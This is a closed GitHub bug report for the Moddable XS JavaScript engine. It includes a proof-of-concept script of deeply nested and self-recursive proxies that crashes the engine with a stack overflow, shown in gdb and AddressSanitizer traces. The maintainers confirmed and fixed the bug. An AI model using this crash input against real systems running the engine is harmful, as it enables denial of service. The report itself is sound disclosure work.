stack-overflow in xs/sources/xsType.c:518 in fxOrdinaryGetProperty #739

Closed
eternalsakura opened this issue Dec 5, 2021 · 1 comment
Closed
Labels
confirmed issue reported has been reproduced fixed - please verify Issue has been fixed. Please verify and close.

Comments

@eternalsakura

Build environment

  • operating system: ubuntu20.04
  • compile command:
cd /pathto/moddable/xs/makefiles/lin
make release
  • test command:
./xst poc

poc

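/**
 * Runs `code` and verifies that it throws.
 *
 * The thrown error is caught here so that one expected failure does not end
 * the script before the remaining checks have run.
 *
 * @param {Function|string} code - Callable to invoke, or source text to evaluate.
 * @param {Function} [type_opt] - Expected error constructor; when given, the
 *     thrown value must be an instance of it.
 * @param {*} [cause_opt] - Accepted for signature compatibility; not checked.
 * @throws {Error} If nothing is thrown, or the thrown value is not a `type_opt`.
 */
function assertThrows(code, type_opt, cause_opt) {
    let caught;
    let didThrow = false;
    try {
        if (typeof code === 'function') {
            code();
        } else if (typeof code === 'string') {
            // eval executes the string as code: pass only literal snippets
            // written in this test file, never data that comes from outside it.
            eval(code);
        }
    } catch (error) {
        caught = error;
        didThrow = true;
    }
    if (!didThrow) {
        throw new Error('assertThrows: expected an exception but none was thrown');
    }
    if (typeof type_opt === 'function' && !(caught instanceof type_opt)) {
        throw new Error(`assertThrows: expected ${type_opt.name}, got ${String(caught)}`);
    }
}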
// Build a chain of 100000 proxies, each wrapping the previous one with an
// empty handler. With no traps defined, every operation on the outermost
// proxy is forwarded to its target, one layer at a time.
let proxy = new Proxy(function () {
}, {});
for (let layersLeft = 100000; layersLeft > 0; layersLeft--) {
    proxy = new Proxy(proxy, {});
}

// Exercise each Reflect operation once against the outermost proxy, in the
// order listed. The ASan trace on this page shows fxProxyGetPropertyValue
// repeating, which is consistent with the property-read probe; the page does
// not say which call crashed.
for (const [operation, extraArgs] of [
    ['apply', [{}, []]],
    ['construct', [[]]],
    ['defineProperty', ['x', {}]],
    ['deleteProperty', ['x']],
    ['get', ['x']],
    ['getOwnPropertyDescriptor', ['x']],
    ['getPrototypeOf', []],
    ['has', ['x']],
    ['isExtensible', []],
    ['ownKeys', []],
    ['preventExtensions', []],
    ['setPrototypeOf', [{}]],
    ['set', ['x', {}]],
]) {
    try {
        Reflect[operation](proxy, ...extraArgs);
    } catch (_) {
        // Deliberately ignored: an engine that bounds its native recursion
        // surfaces a catchable error here, and the next probe still runs.
    }
}
/**
 * Invokes `Reflect[trap]` on a proxy whose handler for that same trap calls
 * `Reflect[trap]` on the proxy again, so the operation re-enters itself
 * without a terminating case.
 *
 * @param {string} trap - Name of the Reflect method / proxy trap to exercise.
 * @param {...*} args - Arguments passed to `Reflect[trap]` after the proxy.
 * @returns {*} Whatever `Reflect[trap]` returns, if it returns at all.
 */
function run(trap, ...args) {
    const traps = {
        // The closure reads `selfProxy` only when the trap fires, which is
        // after the proxy below has been created.
        [trap]: (target, ...forwarded) => Reflect[trap](selfProxy, ...forwarded),
    };
    const selfProxy = new Proxy(function () {
    }, traps);
    const operation = Reflect[trap];
    return operation(selfProxy, ...args);
}
// For every trap, hand assertThrows a closure that starts the self-recursive
// proxy operation, together with the RangeError the engine is expected to
// raise when it runs out of stack.
for (const [trapName, ...trapArgs] of [
    ['apply', {}, []],
    ['construct', []],
    ['defineProperty', 'x', {}],
    ['deleteProperty', 'x'],
    ['get', 'x'],
    ['getOwnPropertyDescriptor', 'x'],
    ['has', 'x'],
    ['isExtensible'],
    ['ownKeys'],
    ['preventExtensions'],
    ['setPrototypeOf', {}],
    ['set', 'x', {}],
]) {
    assertThrows(() => run(trapName, ...trapArgs), RangeError);
}

description

➜  moddable_workdir git:(main) ~/moddable/repo/bin/lin/release/xst poc.js
[1]    1308811 segmentation fault  ~/moddable/repo/bin/lin/release/xst poc.js
...
Stopped reason: SIGSEGV
0x000055555564ba2c in fxOrdinaryGetProperty ()
...

You can debug it with gdb; doing so, I found that this is a stack overflow. I did not use ASan for this run, so the crash is not an ASan false positive.

@eternalsakura
Author

➜  moddable_workdir git:(main) ~/moddable/build/bin/lin/release/xst poc.js                        
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1320209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffec720aff8 (pc 0x000000853c71 bp 0x00000096db60 sp 0x7ffec720b000 T0)
    #0 0x853c71 in fxOrdinaryGetProperty /home/sakura/moddable/xs/sources/xsType.c:518
    #1 0x4ded68 in fxGetAll /home/sakura/moddable/xs/sources/xsAPI.c:930:21
    #2 0x74d865 in fxCheckProxyFunction /home/sakura/moddable/xs/sources/xsProxy.c:158:2
    #3 0x7437b4 in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:431:21
    #4 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #5 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #6 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #7 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #8 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #9 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #10 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #11 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #12 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #13 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #14 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #15 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #16 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #17 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #18 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #19 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #20 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #21 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12
    #22 0x743e4b in fxProxyGetPropertyValue /home/sakura/moddable/xs/sources/xsProxy.c:467:12

@phoddie phoddie added the confirmed issue reported has been reproduced label Dec 8, 2021
mkellner pushed a commit that referenced this issue Dec 8, 2021
@phoddie phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Dec 18, 2021
@phoddie phoddie closed this as completed Dec 18, 2021